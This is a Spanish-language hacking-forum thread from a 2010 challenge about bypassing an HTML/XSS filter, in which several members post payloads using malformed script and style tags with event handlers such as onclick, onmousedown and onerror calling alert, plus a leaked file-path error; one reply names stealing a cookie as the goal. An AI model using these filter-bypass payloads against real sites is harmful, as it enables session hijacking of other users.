[CYH] Bypass de filtros de XSS :)

Iniciado por sirdarckcat, 8 Abril 2010, 08:47 AM

0 Miembros y 1 Visitante están viendo este tema.

SeC

#10
Parece que aún vale, asique :P


<STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE>


otro,

<script>><a href="http://elhacker.net" onclick="alert(1)">XSS</a><
Educad a los niños y no sera necesario castigar a los hombres - Pitagoras.

~ Yoya ~

#11
<Script>><p onMouseDown=alert(0) >aa </p> t=
<script language="javascript">><p onMouseDown=alert(0) >aa </p> t=
<Style>><p onMouseOut=alert(0) >aa </p> t=

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

WHK


jdc

File disclosoure no vale?

CitarWarning: file_get_contents(/home/simoneme/allowhtml/main/files/antisamy.xml) [function.file-get-contents]: failed to open stream: No such file or directory in /home/simoneme/allowhtml/main/include/controllers/source_antisamy.php on line 7


netscape

#15
Aquí estan los mios:

<script>>"/><a><<img src=lol.gif onerror=alert(1)> >

<script>>"/><a><<img src=lol.gif onerror=window.alert(1)> >

'>><marquee><h1>XSS</h1></marquee>

<script><TD><p onmousemove=alert('XSS') >lol </p><TABLE>

<script>><p lang="es"</p> onmouseup=alert('XSS')>>

<script>><q lang="he" dir="rtl"><p onmousedown=alert('XSS')</q></p>>

Saludos!!


cgvwzq

Pero si son todos el mismo...xD

Además, el último de netscape no es ni siquiera un bypass. ¬¬

A lo mucho se puede considerar el de SeC, que usa "style" en lugar de "script". Y da igual poner atributos, no afectan.
Some stuff:

  • www.a] parsed as www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ



Castg!

El último de netscape qué tiene de inyección de javascript?

jdc

Castg no necesitas inyectar javascript para que sea xss

Castg!

¬¬ pero este desafio es asi :D jajja, sino, xss en si es inyeccion HTML, y yapodemos inyectar html. lol.

la idea, es poder inyectar el codigo javascript para quitar una cookie.